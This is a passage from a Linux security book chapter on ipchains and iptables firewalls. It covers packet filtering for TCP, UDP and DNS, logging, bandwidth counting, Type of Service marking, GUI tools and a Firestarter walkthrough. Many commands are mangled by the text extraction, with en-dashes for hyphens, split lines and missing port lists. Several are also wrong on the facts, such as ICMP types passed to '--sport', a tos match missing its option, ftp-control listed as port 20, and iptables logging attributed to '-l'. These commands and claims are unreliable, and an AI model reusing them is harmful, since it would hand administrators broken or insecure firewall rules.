ACCEPT +For Iptables,you would do the following for standard TCP connections: +iptables -A FORWARD -m multiport -p tcp -i eth0 -d 192.168. +1.0/24 80 --syn / +--syn -j ACCEPT +iptables -A FORWARD -m multiport -p tcp -i eth0 +-d 10.100.100.0/24 80--syn / +--syn -j ACCEPT +To allow for outgoing connections,you would issue the following: +iptables -A FORWARD -m multiport -p tcp -i eth0 -d 0/0 --syn -j ACCEPT +iptables -A FORWARD -m multiport -p tcp -i eth1 -d 0/0 --syn -j ACCEPT +iptables -A FORWARD -m multiport -p tcp -i eth2 -d 0/0 --syn -j ACCEPT +All other TCP traffic will be locked out. +Firewalling UDP +To filter incoming and outgoing UDP,you would follow many of the same pro- +cedures as outlined earlier.However,you should allow both TCP port 53 and +UDP port 53,at least at first.Most of the time,DNS uses UDP port 53. +However,DNS can use TCP when a request grows too large,so you should +account for this by creating explicit rules.For Ipchains,you would do the fol- +lowing to allow incoming connections: +ipchains–A input –p udp –i eth0 –d 192.168.1.0/24 53 –j ACCEPT +ipchains–A input –p udp –i eth0 –d 10.100.100.0/24 –j ACCEPT +The preceding rule is necessary only if you plan to allow outside users to +access your DNS server. +ipchains–A input –p udp –i eth0 –d 0/0 –j ACCEPT +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 482 +482 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +For Iptables,you would issue the following commands: +iptables –A FORWARD –m multiport –p udp –i eth0 –d 192.168.1.0/24 / +--dport 53 –j ACCEPT +iptables –A FORWARD –m multiport –p udp –i eth0 –s 192.168.1.0/24 / +--dport 53 –j ACCEPT +Outgoing UDP usually requires that you enable DNS lookups,which are +usually at UDP port 53: +iptables –A FORWARD –m multiport –p udp –i eth0 –d 0/0 --dport +53 –j ACCEPT +iptables –A FORWARD –m multiport –p udp –i eth0 –s 0/0 --dport +53 –j ACCEPT +It is possible that your network requires additional ports.For example,if you +are running SNMP,you would have to open up ports 160 and 161. +Enhancing Firewall Logs +If you want to log these connections,do the following using Ipchains: +ipchains –A input –p tcp –l –j REJECT +ipchains –A input –p udp –l –j REJECT +ipchains –A input –p icmp –l –j REJECT +The preceding commands will log any packet that is matched.If you are +using Iptables,the equivalent commands are: +iptables –A FORWARD –m tcp –p tcp –j LOG +iptables –A FORWARD –m udp –p udp –j LOG +iptables –A FORWARD –m udp –p icmp –j LOG +Usually,creating the ideal packet-filtering rules requires some trial and error, +as well as research specific to your own situation.For more information about +using Ipchains,consult the Ipchains man page,and the Ipchains-HOWTO avail- +able at www.linuxdoc.org/HOWTO/IPCHAINS-HOWTO.html#toc1. +For more information about using Iptables,consult the Iptables man page, +and the Iptables-HOWTO available at various sites,including +www.guenthers.net/doc/howto/en/html/IP-Masquerade-HOWTO.html#toc2. +Using the information in this chapter and additional resources,you will be able +to create a firewall that blocks known attacks. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 483 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 483 +Counting Bandwidth Usage +A Linux firewall can inform you about the number of packets it has processed,in +addition to blocking and logging attacks.The process of counting packets is often +called packet accounting.Many companies are very interested in determining how +much traffic a department or network has generated.This can help them deter- +mine the type of equipment necessary to support the department further.Such +information can also help a company determine how much it can bill a client or +department.In many situations,the firewall is an ideal place to gather such statis- +tics.If you have the following two networks,these rules will count packets that +pass between the two: +ipchains -A forward -p icmp -s 192.168.1.0/24 -d 10.100.100.0/24 +The preceding rule will identify all of the traffic passing from the +192.168.1.0/24 network to the 10.100.100.0/24 network. +If you are using Iptables,you have many additional options.For example,you +can identify specific ICMP packets that are forwarded by the firewall: +iptables -A FORWARD -m icmp -p icmp –f -j LOG +To gather information about a more specific element of ICMP,you could +issue the following command: +iptables -A FORWARD -m icmp -p icmp --sport echo-request -j LOG +This rule will count all icmp echo-request packets (icmp 0).The following +command discovers all of the icmp-reply packets that have been forwarded: +iptables -A FORWARD -m icmp -p icmp --sport echo-reply -j LOG +You are not limited to ICMP packets.If,for example,you wanted to gather +information about the HTTP packets being forwarded,you would enter the +following: +iptables -A FORWARD -p tcp --sport 80,443 -j LOG +To determine the amount of HTTP traffic passing between two networks, +you would issue the following command: +iptables -A FORWARD -s 192.168.1.0/24 -d 10.100.100.0/24 -p tcp +--sport 80,443 -j LOG +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 484 +484 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Listing and Resetting Counters +To list the counter information,you can issue either of the following commands +from a terminal: +ipchains -L -v +iptables -L -v +You can save this information using the ipchains-save and iptables-save +commands.The following commands reset the counters: +ipchains -L -Z +iptables -L -Z +Setting Type of Service in a Linux Router +Many routers,including Linux routers using Ipchains or Iptables,are capable of +shaping traffic as it passes through.The IP header for all packets has a special field +called the Type of Service (ToS) field,which allows you to prioritize traffic as it +passes through the router.Using the ToS field,you can make certain types of +traffic (e.g.,SMTP and POP3) take precedence over others (e.g.,SSH and +Telnet).Packets that are marked will be treated differently at the router.Setting +the ToS field occurs at the Network layer (Layer 3 of the OSI/RM).You can +learn more about how ToS works by consulting RFC 1349. +Usually,assigning priority for packets is a secondary concern when config- +uring a firewall.In some situations,however,you will find it useful for a firewall +to “double up”and offer both services.The main reason why you would set the +ToS field in network traffic is to cut down on network congestion,especially in +networks that have high amounts of traffic. +NOTE +Do not confuse Type of Service (ToS) with Quality of Service (QoS). QoS +refers to the ability of physical devices (i.e., switches, routers) to transmit +packets according to ToS values found in IP packets. QoS concerns might +include whether the packet is delivered via Frame Relay, Asynchronous +Transfer Mode (ATM), Ethernet, Synchronous Optical Network (SONET), +and so forth. Because ToS refers to the ability to mark certain packets so +that they have a higher priority than others do, these markings deter- +mine whether they are available for QoS routing. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 485 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 485 +Service Values +The normal-service value is 0 (or,0x00 in the actual packet).Table 9.7 lists the +four different options available to you when marking a packet. +Table 9.7 ToS Field Options +Service Value Description +Minimum delay The minimum delay field reduces the time a datagram +takes to get from the router to the host. The +minimum delay option is ideal for protocols that +require speed when building initial connections, or +when transferring control data. Traffic such as the +ftp-control port (20), Telnet, and SSH benefits from +this setting. Marking this traffic will reduce latency +(i.e., the time interval between a request and a reply) +at the router. The ToS field bit is 10 (0x10 in the +actual packet). +Maximum throughput This value is appropriate for the ftp-data port (20) +and for large file transfers via HTTP. Networks that use +the X Windows system to export displays between +systems should consider using this bit as well. The ToS +field bit is 8 (0x08 in the actual packet). If you +anticipate large volume transfers via POP3, you could +consider this option as well. +Maximum reliability Used in an attempt to reduce retransmissions. +Sometimes, UDP protocols such as DNS (port 53) and +SNMP (ports 161 and 162) are receive this option. +However, TCP-based protocols such as SMTP also +benefit from this ToS option, because systems can +waste bandwidth to keep retransmitting this +protocol. The ToS bit value is 4 (0x04 in the actual +packet). +Minimum cost This option is often only implemented by commercial +products. The ToS field bit is 2 (0x02 in the actual +packet). +It may be useful to consider these four options in terms of common network +tasks.Client hosts (i.e.,hosts that use X,SSH,FTP,HTTP,and other protocols) +may benefit from either maximum throughput or minimum delay settings. +Servers generally benefit from maximum throughput,depending on the traffic +that they generate. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 486 +486 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Setting ToS Values in Ipchains and Iptables +To set ToS values in Ipchains,add the following values to the end of any rule: +-t andmask xormask +The andmask value is usually 01,because this value compares,or “ands”the +original TOS value,and then allows you to make a change to the packet.The +xormask value can be any of the service values found in Table 9.7 (e.g.,08 for +maximizing throughput).This second field is evaluated as an “or”value,meaning +that if the value you specify is different from the original value,the one you +specify will be set. +For example,to mark the ToS field for maximum throughput for HTTP +(port 80) for all packets being sent out to all remote systems,you would do the +following: +ipchains -A output -s 0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 80 +-p 6 -t 01 08 +The -p 6 option specifies TCP as the protocol.You would never set a ToS +value on a packet that will eventually be dropped.Following are some additional +examples of the ToS value being set on additional protocols: +ipchains -A output -s 0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 21 -p 6 -t 01 04 +ipchains -A output -s 0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 20 -p 6 -t 01 08 +ipchains -A output -s 0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 22:22 -p 6 -t 01 10 +ipchains -A output -s 0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 25:25 -p 6 -t 01 04 +ipchains -A output -s 0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 53:53 -p 6 -t 01 04 +ipchains -A output -s 0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 80:80 -p 6 -t 01 08 +ipchains -A output -s0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 110:110 -p 6 -t 01 08 +ipchains -A output -s0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 143:143 -p 6 -t 01 04 +ipchains -A output -s0.0.0.0/0.0.0.0 -d 0.0.0.0/0.0.0.0 443:443 -p 6 -t 01 04 +Additional ToS Options in Iptables +Iptables,as you might suspect,adds several options and uses some different termi- +nology.First,you can set your router to either match packets with certain ToS +options set,or you can have the router set the actual ToS options.These are two +very different things.One allows the router to handle packets with the ToS value +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 487 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 487 +already set,whereas the other actually sets the values.To create a rule that +matches a ToS field,you would use the -m option,complete with its arguments: +-m tos --TOS tos_value -j TARGET +In the preceding syntax,the tos_value number is any ToS bit found in Table +9.7 (e.g.,08 for maximum throughput).As far as target value is concerned,you +can specify any target you wish (ACCEPT,a user-defined chain,and so forth). +For example,the following rule accepts packets from port 80 with the ToS value +set to 08: +iptables -A INPUT -p tcp -m tos 0x08 -j ACCEPT +As far as setting ToS values is concerned,you can only set them in the FOR- +WARD and OUTPUT chains.The syntax is as follows: +-j TOS --set-tos tos_value +For example,to set the ToS value to maximum throughput for all outgoing +Web traffic,you would do the following: +iptables -A OUTPUT -p tcp -m tcp --dport 80 -j TOS --set-tos 0x08 +Following are some additional examples where Iptables has been used to set +ToS fields for various traffic: +iptables -A OUTPUT -p tcp -m tcp --dport 21 -j TOS --set-tos 0x04 +iptables -A OUTPUT -p tcp -m tcp --dport 20 -j TOS --set-tos 0x08 +iptables -A OUTPUT -p tcp -m tcp --dport 22 -j TOS --set-tos 0x010 +iptables -A OUTPUT -p tcp -m tcp --dport 25 -j TOS --set-tos 0x04 +iptables -A OUTPUT -p tcp -m tcp --dport 53 -j TOS --set-tos 0x04 +iptables -A OUTPUT -p tcp -m tcp --dport 80 -j TOS --set-tos 0x08 +iptables -A OUTPUT -p tcp -m tcp --dport 110 -j TOS --set-tos 0x08 +iptables -A OUTPUT -p tcp -m tcp --dport 143 -j TOS --set-tos 0x04 +iptables -A OUTPUT -p tcp -m tcp --dport 443 -j TOS --set-tos 0x04 +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 488 +488 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Using and Obtaining Automated +Firewall Scripts and Graphical +Firewall Utilities +Several attempts have been made to automate the process of creating a firewall in +Linux.Similarly,developers are also busy creating GUI applications that make the +job easier.Many of these utilities are quite useful,although they are mostly effec- +tive in beginning your firewall configuration;you will likely have to customize +the rules these applications generate. +The more effective firewall scripts and GUI tools include the following +(cid:2) Firestarter A fairly sophisticated graphical tool that supports both +Ipchains and Iptables.It can be used to create a personal firewall,but also +supports multihomed systems.Like many automated firewalls,it creates +multiple rules to filter out known and expected attacks.You may need to +adjust some of these automatic settings.Although Firestarter does sup- +port multiple interfaces,it,like most of the open source GUI firewall +applications,is best used only as a beginning to a firewall on a multi- +homed system.You can obtain Firestarter at http://sourceforge.net/ +projects/firestarter. +(cid:2) Mason A unique product,Mason is designed to first listen in on traffic +passing through your firewall,and then generate Ipchains or ipfwadm +(the precursor to ipchains and Iptables) rules.As of this writing,Mason +does not support Iptables.In spite of this,Mason’s approach to rules cre- +ation is both unique and sound,as it attempts to create rules based on +your network traffic about your firewall needs.You can download this +binary at http://users.dhp.com/~whisper/mason.Do not confuse this +product with the HTML Mason utilities meant to dynamically generate +HTML for Apache Server. +(cid:2) Knetfilter A GUI firewall designed to work with the KDE desktop +environment.Although it purports to be stable,it appears to have prob- +lems working with common versions of KDE.You can learn more about +Knetfilter at http://expansa.sns.it:8080/knetfilter. +(cid:2) MonMotha’s IPTables Firewall This is a firewall script,not a GUI +interface.It is designed to give you a chance to specify the traffic you +want to allow and deny.You must first edit the script and then run it +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 489 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 489 +from a command prompt.You can obtain this script at +http://mirkk.kurd.nu/~monmotha/firewall/index.php. +(cid:2) Firewall Builder Firewall Builder is in many ways the most ambitious +open source GUI tool.It allows you to create rules for multiple inter- +faces,networks,and hosts.It is also quite unstable on most versions of +Red Hat Linux through version 7.1.Learn more about Firewall Builder +at http://sourceforge.net/projects/fwbuilder. +(cid:2) EasyChains As of this writing,EasyChains has a ncurses-based +GUI,and supports only Ipchains.You can download it at +http://sourceforge.net/projects/easychains. +Tools & Traps… +Weighing the Benefits of a Graphical Firewall Utility +As you consider using any of the GUI applications covered in this section, +keep is mind the following issues: +(cid:2) Often, these downloads do not provide public keys or hash +values for their code; therefore, before using any of the +applications, make sure that you review the source code. If +you cannot review the source code yourself, then employ +someone to check it, especially if you plan to use it in an +enterprise environment. +(cid:2) Most of these applications are still in beta form, so +remember that they often provide limited functionality. +Although some, such as Mason, are quite impressive, limita- +tions still persist: As of this writing, Mason does not support +Iptables. +(cid:2) The more advanced GUI applications often require you to +upgrade to either the very latest version of a particular +window manager, such as KDE or Gnome, or to use an +idiosyncratic version or configuration. Consequently, you may +have to spend a great deal of time configuring your window +manager. Generally, this time could be better spent learning +how to use Iptables or Ipchains commands. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 490 +490 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Firewall Works in Progress +The following is a partial list of applications being developed at the current time: +(cid:2) jb dynFW (http://sourceforge.net/projects/jbdfw) This project appears +to be interested in creating a personal firewall product,as opposed to a +multihomed firewall. +(cid:2) Heimdall Linuxconf Firewall (http://sourceforge.net/projects/ +heimdall) A promising effort,mainly because it proposes to be an add- +on to the Linuxconf application. +(cid:2) NetFilter-1 (http://sourceforge.net/projects/netfilter-1) If it lives up to +its promise,this particular project could produce a truly useful piece of +software,because it is trying to mimic the CheckPoint Firewall-1 +product.Its “secure logging”feature will employ encryption so that the +firewall can log to remote systems without the fear of sniffing attacks. +(cid:2) PHP Ipchains project (http://sourceforge.net/projects/phpchains) +The primary strength of this product is that it is based on PHP,which is +a truly portable language,and is well supported by Apache Server. +Because many other security applications use PHP,this product may +allow you to apply skills you have already learned. +(cid:2) Positive Control (http://sourceforge.net/projects/positivecontrol) Not +only does this project plan on releasing a GUI,but it also plans on cre- +ating a firewall that can detect port scans through stateful inspection, +which is basically a way for the firewall to maintain and scan its own +dynamic database.If this database senses a number of ports that have +been scanned in a row,the firewall can take action.Some actions the +firewall can take may include automatic firewall reconfiguration and +automatic alerts. +Exercise: Using Firestarter to +Create a Personal Firewall +1. Make the necessary preparations for your firewall.If you are creating a +personal firewall,then you can simply move on to step 2.If you want to +use your firewall to masquerade connections,you should understand that +Firestarter may not do the best job creating forwarding and nat/ +masquerading rules,so you may want to create them first.You will see +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 491 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 491 +later in this exercise how you can configure Firestarter to enable +masquerading for you. +2. Once you have verified and tested your masquerading (if necessary) +copy firestarter-0.7.0-1.i386.rpm from the CD that accompanies this +book,or download the latest Firestarter RPM or tarball from +http://sourceforge.net/projects/firestarter.The RPM and tarball pack- +ages are equivalent.They do not require any special libraries;if you have +installed either the Gnome or KDE window managers,you will have no +problem. +3. Install Firestarter.If you are using the RPM,you would issue the +following command: +rpm –ivh firestarter-0.7.0-1.i386.rpm +4. Now,start X and enter the following in a terminal: +firestarter +5. If an existing Ipchains or Iptables configuration exists,you may see the +warning shown in Figure 9.3. +If necessary,click Yes.You should note that this warning will also +appear if you restart Firestarter.If you are using this wizard on a system +that already has masquerading configured,you would click No to save this +configuration.Firestarter will simply append its configuration to yours. +Figure 9.3 Firestarter Warning +6. When you first launch Firestarter,the configuration wizard,shown in +Figure 9.4,should appear automatically. +If the wizard does not appear,maximize the main interface and go +to Firewall | Run firewall wizard. +7. Once the wizard begins,click Next. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 492 +492 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Figure 9.4 The Firestarter Configuration Wizard Initial Screen +8. The Network Device Configuration screen will appear,as shown in +Figure 9.5.Select the interface you want to protect,and click Next. +You will notice that in this particular example,the eth0 interface is +selected.Firestarter is written well enough so that it will automatically +detect all of your interfaces. +Figure 9.5 The Network Device Configuration Screen +9. The Services Configuration window,shown in Figure 9.6,will appear. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 493 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 493 +Figure 9.6 The Services Configuration Window +10. Configure the services that you desire.Figure 9.6 shows that only SSH +will be allowed to connect to the firewall.Your settings will differ +according to your needs.When you are finished selecting the services +you want to provide on this interface,click Next. +11. The ICMP Configuration screen will appear,as shown in Figure 9.7.By +default,Firestarter disables all ICMP filtering,which means that all +ICMP packets will be allowed to pass through the firewall.Select +Figure 9.7 The ICMP Configuration Screen +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 494 +494 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Enable ICMP Filtering,and then select the ICMP packet types that +you want to filter.You will notice that in this particular example,no +ICMP packets will be allowed to traverse the firewall. +12. When you have selected the ICMP packets you want to block,click +Next.Firestarter will inform you that it is ready to generate the firewall, +as shown in Figure 9.8.Click Finish to do so. +Figure 9.8 Completing the Firewall Generation Process in Firestarter +13. The wizard will disappear,and you will see the Firestarter main inter- +face,shown in Figure 9.9. +14. The main interface defaults to the Firewall hits tab,which is a graph- +ical logging device.If a packet matches the rules you have generated,it +will be instantaneously logged here.From a remote system,generate +some traffic that you have blocked.For example,if you have not enabled +Telnet support,try to telnet to this system.After enough traffic is gener- +ated,you will see the logging screen fill up,as shown in Figure 9.10. +15. Now,select the Dynamic Rules tab.From here,you can add rules to +those that Firestarter has automatically generated.It is important to +understand that Firestarter imposes a fairly strict series of rules.You may +need to open up some ports to suit your needs.Following is a brief +overview of your options: +(cid:2) Deny all connections from Allows you to block a specific host. +If,for example,you have left the SSH port open to all systems,you +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 495 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 495 +Figure 9.9 The Firestarter Main Interface +Figure 9.10 Viewing Logged Packet Matches in Firestarter +can specify a host or range of IP addresses here.As with any of the +dynamic options,the rules you enter here will override any settings +established by either Firestarter or the Firestarter wizard. +(cid:2) Allow all connections from Enables you to allow a host or range +of IP addresses full access to your system.Be careful when using this +option,because it can expose your firewall to IP spoofing. +Remember,it opens all ports on your interface to a remote system. +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 496 +496 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +(cid:2) Open service to machine Allows you to open a specific port or +range of ports to a specific host or range of IP addresses. +(cid:2) Open service to anyone Opens a port to all hosts on the net- +work,and any other network.Like the Allow all connections +from setting,this option is quite powerful,and can reduce your fire- +wall’s security.Specifying this option allows any host on your net- +work or on any other to access the port you specify. +You can also add and remove all rules in a particular group,or you +can remove all of the dynamic rules you have created. +16. Right-click in the Allow all connections from field,and then select +Add new rule.You will see a dialog box,shown in Figure 9.11,where +you can enter either an IP address or a host name.Enter the IP address +of a remote host here.Although you can enter a DNS name,it is best if +you use an IP address.When you are finished,click OK. +Figure 9.11 The Add New Rule Dialog Box +17. You will see that the IP address or host name (if this is what you entered) +is entered in the Allow all connections from dialog box (Figure 9.12). +Test this setting by using the remote client you have specified. +18. Experiment with the additional settings to see how well Firestarter is +able to configure the interface to suit your needs. +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 497 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 497 +Figure 9.12 Allowing SSH and Telnet Service to a System +Named “keats” +When you have configured Firestarter,open a second terminal and +list the chains.If,for example,you are using Iptables,issue the following +command: +iptables -L +19. You will see a list of many different rules,most of which have been +added by Firestarter.Consider that some of these rules may not be nec- +essary for your particular situation.Use the -D option to delete the rules +you do not need.Make sure you test your firewall each time you delete +a rule. +20. When you are finished,use the iptables-save or ipchains-save +command to save your rules: +ipchains-save > firestarter.chains +iptables-save > firestarter.chains +You can then restore your firewall by using the ipchains-restore or +iptables-restore command. +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 498 +498 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +21. It is also possible to save the logs generated by Firestarter.In the main +interface,go to Hit List | Save firewall hit list to file.You will be +asked to enter the name of the text file where the logs will be stored. +Do so,and then press OK.When you have saved the log file,open it in a +text editor.You will see a report that details the connection,including +the source IP address,the time of the attempted connection,and the +protocol used. +22. When you are finished saving your log,you can clear the log screen and +begin logging again. +Exercise: Using Advanced Firestarter Features +1. Go to Firewall | Preferences and examine the additional options +offered by Firestarter.These include the ability for Firestarter to play a +sound whenever a packet matches a rule,starting Firestarter “hidden,”so +that you do not see the interface,and,the most interesting feature,the +one that shows every page in the configuration wizard.You can access +this feature by selecting the Advanced icon,and then clicking Show +every page in wizard. +2. When you have done this,restart the wizard.You will then be given +additional options,including the ability to create masquerading rules,as +shown in Figure 9.13,and the ability to create ToS associations,shown in +Figure 9.14. +This particular page allows you to have Firestarter automatically dis- +cover the internal network IP range,which works rather sporadically.In +addition,notice that you can also enable specific port forwarding rules.If +you do not want to rely on the Autodetect feature,you can specify your +own range. +The ToS configuration feature is effective if you want to give certain +services,such as e-mail or the X Windows system,more priority than +others have.In this particular example,the choice was made to give pri- +ority to server applications,such as FTP,Squid,SSH,SMTP,and POP3. +You will,of course,choose the option that best suits you. +You can choose these settings according to your needs. +3. When you are finished using the wizard,you can then re-edit your +settings to create the best firewall for your situation. +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 499 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 499 +Figure 9.13 The IP Masquerade Configuration Screen +Figure 9.14 The ToS Configuration Screen +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 500 +500 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Summary +A firewall is the chief means of establishing a network perimeter.It is vital to sep- +arate your own network from all others,as doing so helps you to manage and +secure your network hosts.In this chapter,you reviewed concepts essential to +firewalling.You have learned about IP forwarding,as well as masquerading and +packet filtering.You then used Ipchains and Iptables to create firewall rules. +This chapter also showed you how to enable logging and ToS bits on network +traffic,ands how to save,edit,and restore Ipchains and Iptables entries.You were +provided with practical advice concerning commands to take,and saw how GUI +and automated applications have been created to help build firewalls. +With this information ,you now have all of the tools necessary to begin cre- +ating your own firewall using either Ipchains or Iptables. +Solutions Fast Track +Understanding the Need for a Firewall +(cid:59) Linux natively supports the ability to route and/or filter packets. +Modern Linux systems use either Ipchains or Iptables to do this.Ipchains +supports Linux kernel versions up to 2.2.If you are using any kernel +newer than 2.2,you must use Iptables.The Iptables package supports +packet masquerading and filtering functionality as found in the 2.3 +kernel and later.This functionality is known as netfilter.Therefore,in +order to use Iptables,you must recompile the kernel so that netfilter is +installed,and you must install the Iptables package. +(cid:59) Ipchains and Iptables also allow you to configure your Linux router to +masquerade traffic (i.e.,to rewrite IP headers so that a packet appears to +originate from a certain host),and/or to examine and block traffic.The +practice of examining and blocking traffic is often called packet filtering. +(cid:59) The primary difference between a packet-filtering router (e.g.,one cre- +ated by using Ipchains or Iptables) and a proxy server (e.g.,one enabled +by Squid) is that a packet-filtering router does not inspect network +packets as deeply as a proxy server does.However,proxy servers require +more system resources in order to process network packets. +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 501 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 501 +(cid:59) Watch for bug reports concerning Ipchains,Iptables,and the Linux +kernel.Keeping current about such changes can help you quickly +upgrade your system in case a problem is discovered. +Deploying IP Forwarding and Masquerading +(cid:59) IP forwarding is the ability for a Linux system to act as a router. +(cid:59) A Linux system with simple IP forwarding enabled can route any net- +work address to another.If you are allotted a range of IP addresses from +a local or regional Internet registry,you can use a multihomed Linux +system to route this set of addresses to another network. +(cid:59) In order to allow private network addresses to reach the Internet,you +need to invoke Ipchains/Iptables-based IP masquerading. +(cid:59) In a Linux router,you can use either Ipchains or Iptables to forward +and/or alter the IP headers of packets originating from private-IP +address networks to pass through Internet routers.Both Ipchains and +Iptables do this by processing IP packets through the Linux kernel.You +should note that this option is not necessarily secure—IP masquerading +leaves all client hosts wide open to attack. +(cid:59) Masquerading is when your Linux system rewrites the IP headers of a +network packet so that the packet appears to originate from a different +host.The practice of rewriting IP packets is colloquially known as packet +mangling.Masquerading is useful because you can use it to invoke network +address translation (NAT),where one IP address can stand in for several. +(cid:59) Translating the private to routable Internet address is accomplished by a +database stored on the Ipchains/Iptables-based Linux router.The Linux +masquerading router keeps this database so that it knows how to +“untranslate,”as it were,the packets that have been mangled so that they +can then be addressed to the local,private network. +Configuring Your Firewall to Filter Network Packets +(cid:59) To create packet-filtering rules for outgoing traffic,configure your Linux +firewall to deny all outgoing traffic unless explicitly allowed.Where +incoming traffic is concerned,you have many options,including to +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 502 +502 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +forbid all incoming traffic unless it is part of an already established ses- +sion,and to disable all forwarding except for networks that require it. +(cid:59) Most Linux operating systems,such as Red Hat,Slackware,SuSE,and +Caldera,support IP forwarding,masquerading,and firewalling by default. +However,you may have to reconfigure your kernel in order to provide +full functionality. +Understanding Tables and Chains in a Linux Firewall +(cid:59) Iptables derives its name from the three default tables it uses:filter,nat, +and mangle.Each interface on your system can have its packets managed +and modified by the chains contained in each of these tables. +(cid:59) A chain is a series of actions to take on a packet.Whenever you use +Ipchains or Iptables to configure a firewall,the proper perspective to +adopt is to view all packets from the firewall itself. +(cid:59) If you are using the filter table,each interface on your network has three +different default chains:INPUT,FORWARD,and OUTPUT. +(cid:59) Ipchains and Iptables use built-in targets to specify the destination of a +packet.By far,the common most built-in targets are DROP and +ACCEPT. +Logging Packets at the Firewall +(cid:59) The Iptables -l option allows you to log matching packets.You can insert +-l into any rule,as long as you do not interrupt a particular option. +Iptables allows you to log packets in a more sophisticated way because it +uses the LOG target,which you specify just like DROP or ACCEPT. +(cid:59) By default,Iptables will limit logging of packets.The default limit rate is +three logging instances an hour.This behavior is meant to ensure that +log files do not get too large. +(cid:59) An example used in this section uses Ipchains and Iptables commands to +add and remove packet-filtering rules,prohibiting every service from +entering your firewall,except for Secure Shell (SSH),which uses port 22. +This would not allow any user interactively logged in to the system to +check e-mail or any other Internet-based service—the rule is restrictive, +but is designed to lock down the firewall as much as possible. +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 503 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 503 +(cid:59) With Iptables,you can reject specific ICMP types. +(cid:59) Port redirection in Ipchains and Iptables is where a packet destined for a +certain port (say,port 80) is received by an interface,and is then sent to +another port,using the REDIRECT target.Redirecting ports is +common in networks that use proxy servers. +Configuring a Firewall +(cid:59) Regardless of whether you are using Ipchains or Iptables,the first thing +you will have to do for your firewall is to flush all existing rules using +the -F option.Then,you need to use the -P option to set the firewall +policies to deny all connections by default.The subsequent rules you +create will then allow the protocols you really want.Then,use the neces- +sary commands to enable forwarding and masquerading.Without this +foundation,you will not be able to forward packets at all,and thus fire- +walling them would be superfluous. +(cid:59) Many times,a hacker will try to use your firewall as a default gateway +and try to spoof internal packets.If a firewall’s “Internet interface”(i.e., +the one that is responsible for addressing packets to the Internet) is not +configured to explicitly deny packets from the network,then you are +susceptible to this attack. +(cid:59) The example describing allowing inbound and outbound TCP connec- +tions illustrates that with Ipchains and Iptables,the ! character reverses +the meaning of anything that is in front of it. +(cid:59) Creating the ideal packet-filtering rules requires some trial and error,as +well as research specific to your own situation. +Counting Bandwidth Usage +(cid:59) A Linux firewall can inform you about the number of packets it has +processed,in addition to blocking and logging attacks.The process of +counting packets is often called packet accounting. +(cid:59) Many routers,including Linux routers using Ipchains or Iptables,are +capable of shaping traffic as it passes through.The IP header for all +packets has a special field called the Type of Service (ToS) field,which +allows you to prioritize traffic as it passes through the router. +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 504 +504 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +(cid:59) The main reason why you would set the ToS field in network traffic is +to cut down on network congestion,especially in networks that have +high amounts of traffic. +Using and Obtaining Automated Firewall +Scripts and Graphical Firewall Utilities +(cid:59) Several attempts have been made to automate the process of creating a +firewall in Linux.Many of these utilities are quite useful,although they +are mostly effective in beginning your firewall configuration;you will +likely have to customize the rules these applications generate. +(cid:59) Most of these applications are still in beta form,so remember that they +often provide limited functionality. +(cid:59) Firestarter is a fairly sophisticated graphical tool that supports both +Ipchains and Iptables.It can be used to create a personal firewall,but also +supports multihomed systems. +(cid:59) Mason is designed to first listen in on traffic passing through your fire- +wall,and then generate Ipchains or ipfwadm (the precursor to ipchains +and Iptables) rules. +(cid:59) Firewall Builder is in many ways the most ambitious open source +GUI tool.It allows you to create rules for multiple interfaces,networks, +and hosts. +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 505 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 505 +Frequently 